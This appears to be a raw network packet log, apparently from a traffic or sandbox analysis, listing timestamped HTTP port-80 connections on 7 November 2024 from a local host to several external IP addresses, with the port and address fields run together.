                                                                                                                                  Nov 7, 2024 12:53:59.690536022 CET5002180192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:53:59.695595980 CET805002113.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:00.713577986 CET5002280192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:54:00.718466997 CET805002213.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:00.725572109 CET5002280192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:54:00.857305050 CET5002280192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:54:00.862396955 CET805002213.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:00.862433910 CET805002213.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:00.862443924 CET805002213.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:00.862453938 CET805002213.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:00.862472057 CET805002213.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:00.862488985 CET805002213.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:00.862497091 CET805002213.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:00.862555027 CET805002213.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:00.862565994 CET805002213.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:01.392457008 CET805002213.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:01.392510891 CET5002280192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:54:02.381580114 CET5002280192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:54:02.386689901 CET805002213.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:03.412920952 CET5002380192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:54:03.417962074 CET805002313.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:03.418037891 CET5002380192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:54:03.430110931 CET5002380192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:54:03.434895039 CET805002313.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:04.087508917 CET805002313.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:04.119148970 CET805002313.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:04.125673056 CET5002380192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:54:04.467715025 CET5002380192.168.2.413.248.169.48
                                                                                                                                  Nov 7, 2024 12:54:04.473582983 CET805002313.248.169.48192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:09.916515112 CET5002480192.168.2.438.47.232.194
                                                                                                                                  Nov 7, 2024 12:54:09.921452999 CET805002438.47.232.194192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:09.921575069 CET5002480192.168.2.438.47.232.194
                                                                                                                                  Nov 7, 2024 12:54:09.993041039 CET5002480192.168.2.438.47.232.194
                                                                                                                                  Nov 7, 2024 12:54:09.997946978 CET805002438.47.232.194192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:10.896868944 CET805002438.47.232.194192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:11.078253031 CET805002438.47.232.194192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:11.078315973 CET5002480192.168.2.438.47.232.194
                                                                                                                                  Nov 7, 2024 12:54:11.518589973 CET5002480192.168.2.438.47.232.194
                                                                                                                                  Nov 7, 2024 12:54:12.537192106 CET5002580192.168.2.438.47.232.194
                                                                                                                                  Nov 7, 2024 12:54:12.542048931 CET805002538.47.232.194192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:12.542165995 CET5002580192.168.2.438.47.232.194
                                                                                                                                  Nov 7, 2024 12:54:12.552975893 CET5002580192.168.2.438.47.232.194
                                                                                                                                  Nov 7, 2024 12:54:12.557817936 CET805002538.47.232.194192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:13.487097025 CET805002538.47.232.194192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:13.581032038 CET5002580192.168.2.438.47.232.194
                                                                                                                                  Nov 7, 2024 12:54:13.666421890 CET805002538.47.232.194192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:13.666498899 CET5002580192.168.2.438.47.232.194
                                                                                                                                  Nov 7, 2024 12:54:14.065617085 CET5002580192.168.2.438.47.232.194
                                                                                                                                  Nov 7, 2024 12:54:15.084841967 CET5002680192.168.2.438.47.232.194
                                                                                                                                  Nov 7, 2024 12:54:15.089896917 CET805002638.47.232.194192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:15.090029001 CET5002680192.168.2.438.47.232.194
                                                                                                                                  Nov 7, 2024 12:54:15.101788044 CET5002680192.168.2.438.47.232.194
                                                                                                                                  Nov 7, 2024 12:54:15.106758118 CET805002638.47.232.194192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:15.106787920 CET805002638.47.232.194192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:15.106851101 CET805002638.47.232.194192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:15.106861115 CET805002638.47.232.194192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:15.106930017 CET805002638.47.232.194192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:15.106952906 CET805002638.47.232.194192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:15.106961966 CET805002638.47.232.194192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:15.106971979 CET805002638.47.232.194192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:15.106980085 CET805002638.47.232.194192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:16.066637993 CET805002638.47.232.194192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:16.190359116 CET5002680192.168.2.438.47.232.194
                                                                                                                                  Nov 7, 2024 12:54:16.248219967 CET805002638.47.232.194192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:16.248580933 CET5002680192.168.2.438.47.232.194
                                                                                                                                  Nov 7, 2024 12:54:16.612312078 CET5002680192.168.2.438.47.232.194
                                                                                                                                  Nov 7, 2024 12:54:17.631000042 CET5002780192.168.2.438.47.232.194
                                                                                                                                  Nov 7, 2024 12:54:17.635879040 CET805002738.47.232.194192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:17.635966063 CET5002780192.168.2.438.47.232.194
                                                                                                                                  Nov 7, 2024 12:54:17.642848015 CET5002780192.168.2.438.47.232.194
                                                                                                                                  Nov 7, 2024 12:54:17.647994041 CET805002738.47.232.194192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:18.611845016 CET805002738.47.232.194192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:18.690356016 CET5002780192.168.2.438.47.232.194
                                                                                                                                  Nov 7, 2024 12:54:18.793912888 CET805002738.47.232.194192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:18.796435118 CET5002780192.168.2.438.47.232.194
                                                                                                                                  Nov 7, 2024 12:54:18.799598932 CET5002780192.168.2.438.47.232.194
                                                                                                                                  Nov 7, 2024 12:54:18.805237055 CET805002738.47.232.194192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:23.819689035 CET5002880192.168.2.4167.172.133.32
                                                                                                                                  Nov 7, 2024 12:54:23.824713945 CET8050028167.172.133.32192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:23.824789047 CET5002880192.168.2.4167.172.133.32
                                                                                                                                  Nov 7, 2024 12:54:23.836679935 CET5002880192.168.2.4167.172.133.32
                                                                                                                                  Nov 7, 2024 12:54:23.841567993 CET8050028167.172.133.32192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:24.490442991 CET8050028167.172.133.32192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:24.527786970 CET8050028167.172.133.32192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:24.527889013 CET5002880192.168.2.4167.172.133.32
                                                                                                                                  Nov 7, 2024 12:54:25.346849918 CET5002880192.168.2.4167.172.133.32
                                                                                                                                  Nov 7, 2024 12:54:26.365612030 CET5002980192.168.2.4167.172.133.32
                                                                                                                                  Nov 7, 2024 12:54:26.372617960 CET8050029167.172.133.32192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:26.372721910 CET5002980192.168.2.4167.172.133.32
                                                                                                                                  Nov 7, 2024 12:54:26.385613918 CET5002980192.168.2.4167.172.133.32
                                                                                                                                  Nov 7, 2024 12:54:26.390772104 CET8050029167.172.133.32192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:27.045749903 CET8050029167.172.133.32192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:27.084048033 CET8050029167.172.133.32192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:27.084115982 CET5002980192.168.2.4167.172.133.32
                                                                                                                                  Nov 7, 2024 12:54:27.893675089 CET5002980192.168.2.4167.172.133.32
                                                                                                                                  Nov 7, 2024 12:54:28.933617115 CET5003080192.168.2.4167.172.133.32
                                                                                                                                  Nov 7, 2024 12:54:28.938591003 CET8050030167.172.133.32192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:28.944777966 CET5003080192.168.2.4167.172.133.32
                                                                                                                                  Nov 7, 2024 12:54:29.017657042 CET5003080192.168.2.4167.172.133.32
                                                                                                                                  Nov 7, 2024 12:54:29.022598028 CET8050030167.172.133.32192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:29.022638083 CET8050030167.172.133.32192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:29.022777081 CET8050030167.172.133.32192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:29.022847891 CET8050030167.172.133.32192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:29.022859097 CET8050030167.172.133.32192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:29.022864103 CET8050030167.172.133.32192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:29.022867918 CET8050030167.172.133.32192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:29.022876978 CET8050030167.172.133.32192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:29.022886992 CET8050030167.172.133.32192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:29.615838051 CET8050030167.172.133.32192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:29.659142017 CET5003080192.168.2.4167.172.133.32
                                                                                                                                  Nov 7, 2024 12:54:29.662589073 CET8050030167.172.133.32192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:29.662669897 CET5003080192.168.2.4167.172.133.32
                                                                                                                                  Nov 7, 2024 12:54:30.518615007 CET5003080192.168.2.4167.172.133.32
                                                                                                                                  Nov 7, 2024 12:54:31.542953014 CET5003180192.168.2.4167.172.133.32
                                                                                                                                  Nov 7, 2024 12:54:31.548197031 CET8050031167.172.133.32192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:31.548310041 CET5003180192.168.2.4167.172.133.32
                                                                                                                                  Nov 7, 2024 12:54:31.558881044 CET5003180192.168.2.4167.172.133.32
                                                                                                                                  Nov 7, 2024 12:54:31.563767910 CET8050031167.172.133.32192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:32.226411104 CET8050031167.172.133.32192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:32.265198946 CET8050031167.172.133.32192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:32.265623093 CET5003180192.168.2.4167.172.133.32
                                                                                                                                  Nov 7, 2024 12:54:32.290210962 CET5003180192.168.2.4167.172.133.32
                                                                                                                                  Nov 7, 2024 12:54:32.295352936 CET8050031167.172.133.32192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:37.353308916 CET5003280192.168.2.4162.0.211.143
                                                                                                                                  Nov 7, 2024 12:54:37.358223915 CET8050032162.0.211.143192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:37.358285904 CET5003280192.168.2.4162.0.211.143
                                                                                                                                  Nov 7, 2024 12:54:37.375785112 CET5003280192.168.2.4162.0.211.143
                                                                                                                                  Nov 7, 2024 12:54:37.381002903 CET8050032162.0.211.143192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:38.040174007 CET8050032162.0.211.143192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:38.079117060 CET8050032162.0.211.143192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:38.079369068 CET5003280192.168.2.4162.0.211.143
                                                                                                                                  Nov 7, 2024 12:54:38.877986908 CET5003280192.168.2.4162.0.211.143
                                                                                                                                  Nov 7, 2024 12:54:39.896991014 CET5003380192.168.2.4162.0.211.143
                                                                                                                                  Nov 7, 2024 12:54:39.901945114 CET8050033162.0.211.143192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:39.902018070 CET5003380192.168.2.4162.0.211.143
                                                                                                                                  Nov 7, 2024 12:54:39.916384935 CET5003380192.168.2.4162.0.211.143
                                                                                                                                  Nov 7, 2024 12:54:39.921571016 CET8050033162.0.211.143192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:41.424860954 CET5003380192.168.2.4162.0.211.143
                                                                                                                                  Nov 7, 2024 12:54:41.471740961 CET8050033162.0.211.143192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:41.475810051 CET8050033162.0.211.143192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:41.475866079 CET5003380192.168.2.4162.0.211.143
                                                                                                                                  Nov 7, 2024 12:54:42.443736076 CET5003480192.168.2.4162.0.211.143
                                                                                                                                  Nov 7, 2024 12:54:42.448815107 CET8050034162.0.211.143192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:42.448924065 CET5003480192.168.2.4162.0.211.143
                                                                                                                                  Nov 7, 2024 12:54:42.461678028 CET5003480192.168.2.4162.0.211.143
                                                                                                                                  Nov 7, 2024 12:54:42.466587067 CET8050034162.0.211.143192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:42.466610909 CET8050034162.0.211.143192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:42.466659069 CET8050034162.0.211.143192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:42.466667891 CET8050034162.0.211.143192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:42.466744900 CET8050034162.0.211.143192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:42.466757059 CET8050034162.0.211.143192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:42.466770887 CET8050034162.0.211.143192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:42.466814041 CET8050034162.0.211.143192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:42.466846943 CET8050034162.0.211.143192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:43.143553019 CET8050034162.0.211.143192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:43.182037115 CET8050034162.0.211.143192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:43.182118893 CET5003480192.168.2.4162.0.211.143
                                                                                                                                  Nov 7, 2024 12:54:43.971750021 CET5003480192.168.2.4162.0.211.143
                                                                                                                                  Nov 7, 2024 12:54:44.990598917 CET5003580192.168.2.4162.0.211.143
                                                                                                                                  Nov 7, 2024 12:54:45.123651028 CET8050035162.0.211.143192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:45.123753071 CET5003580192.168.2.4162.0.211.143
                                                                                                                                  Nov 7, 2024 12:54:45.132808924 CET5003580192.168.2.4162.0.211.143
                                                                                                                                  Nov 7, 2024 12:54:45.137705088 CET8050035162.0.211.143192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:45.805418015 CET8050035162.0.211.143192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:45.843894958 CET8050035162.0.211.143192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:45.843997002 CET5003580192.168.2.4162.0.211.143
                                                                                                                                  Nov 7, 2024 12:54:45.844995975 CET5003580192.168.2.4162.0.211.143
                                                                                                                                  Nov 7, 2024 12:54:45.850616932 CET8050035162.0.211.143192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:59.430984020 CET5003680192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:54:59.437334061 CET8050036162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:54:59.437397957 CET5003680192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:54:59.451555967 CET5003680192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:54:59.458127975 CET8050036162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:00.338534117 CET8050036162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:00.338557005 CET8050036162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:00.338579893 CET8050036162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:00.338596106 CET8050036162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:00.338613987 CET8050036162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:00.338627100 CET8050036162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:00.338637114 CET8050036162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:00.338650942 CET8050036162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:00.338661909 CET8050036162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:00.338660002 CET5003680192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:00.338676929 CET8050036162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:00.338716030 CET5003680192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:00.338716030 CET5003680192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:00.338716030 CET5003680192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:00.343564034 CET8050036162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:00.343579054 CET8050036162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:00.343590975 CET8050036162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:00.343645096 CET5003680192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:00.393573999 CET5003680192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:00.457209110 CET8050036162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:00.457434893 CET8050036162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:00.457452059 CET8050036162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:00.457668066 CET5003680192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:00.956131935 CET5003680192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:01.974802971 CET5003780192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:01.980434895 CET8050037162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:01.980525970 CET5003780192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:01.991162062 CET5003780192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:01.996110916 CET8050037162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:02.866318941 CET8050037162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:02.866408110 CET8050037162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:02.866420031 CET8050037162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:02.866430998 CET8050037162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:02.866444111 CET8050037162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:02.866456032 CET8050037162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:02.866471052 CET8050037162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:02.866477966 CET5003780192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:02.866494894 CET8050037162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:02.866504908 CET5003780192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:02.866506100 CET8050037162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:02.866516113 CET8050037162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:02.866568089 CET5003780192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:02.871303082 CET8050037162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:02.871330023 CET8050037162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:02.871344090 CET8050037162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:02.871412992 CET5003780192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:02.982115984 CET8050037162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:02.982372999 CET8050037162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:02.982384920 CET8050037162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:02.982434988 CET5003780192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:03.503243923 CET5003780192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:04.522191048 CET5003880192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:04.527093887 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:04.527173996 CET5003880192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:04.539241076 CET5003880192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:04.544255972 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:04.544397116 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:04.544406891 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:04.544410944 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:04.544423103 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:04.544467926 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:04.544483900 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:04.544497967 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:04.544554949 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:05.440449953 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:05.440479040 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:05.440490961 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:05.440505028 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:05.440540075 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:05.440538883 CET5003880192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:05.440576077 CET5003880192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:05.440586090 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:05.440644026 CET5003880192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:05.440675020 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:05.440685987 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:05.440691948 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:05.440697908 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:05.440845966 CET5003880192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:05.445409060 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:05.445421934 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:05.445547104 CET5003880192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:05.559365034 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:05.559417009 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:05.559601068 CET5003880192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:05.560259104 CET8050038162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:05.560384035 CET5003880192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:06.050035954 CET5003880192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:07.069401979 CET5003980192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:07.074388027 CET8050039162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:07.074464083 CET5003980192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:07.083199024 CET5003980192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:07.088107109 CET8050039162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:07.800890923 CET8050039162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:07.833936930 CET8050039162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:07.834224939 CET5003980192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:07.835731983 CET5003980192.168.2.4162.241.85.94
                                                                                                                                  Nov 7, 2024 12:55:07.842138052 CET8050039162.241.85.94192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:12.898284912 CET5004080192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:12.903179884 CET80500403.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:12.903254032 CET5004080192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:12.916135073 CET5004080192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:12.921025038 CET80500403.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:13.537586927 CET80500403.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:13.539866924 CET5004080192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:14.424954891 CET5004080192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:14.430001020 CET80500403.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:15.443840981 CET5004180192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:15.448781967 CET80500413.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:15.451889992 CET5004180192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:15.464133024 CET5004180192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:15.468967915 CET80500413.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:16.078177929 CET80500413.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:16.079848051 CET5004180192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:16.987309933 CET5004180192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:16.992314100 CET80500413.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:18.006231070 CET5004280192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:18.011651993 CET80500423.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:18.012610912 CET5004280192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:18.025716066 CET5004280192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:18.030617952 CET80500423.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:18.030633926 CET80500423.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:18.030653000 CET80500423.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:18.030663013 CET80500423.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:18.030670881 CET80500423.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:18.030680895 CET80500423.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:18.030692101 CET80500423.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:18.030771017 CET80500423.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:18.030790091 CET80500423.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:18.680938005 CET80500423.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:18.681000948 CET5004280192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:19.534431934 CET5004280192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:19.540935993 CET80500423.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:20.615354061 CET5004380192.168.2.43.33.130.190
                                                                                                                                  Nov 7, 2024 12:55:20.620254040 CET80500433.33.130.190192.168.2.4
                                                                                                                                  Nov 7, 2024 12:55:20.620405912 CET5004380192.168.2.43.33.130.190
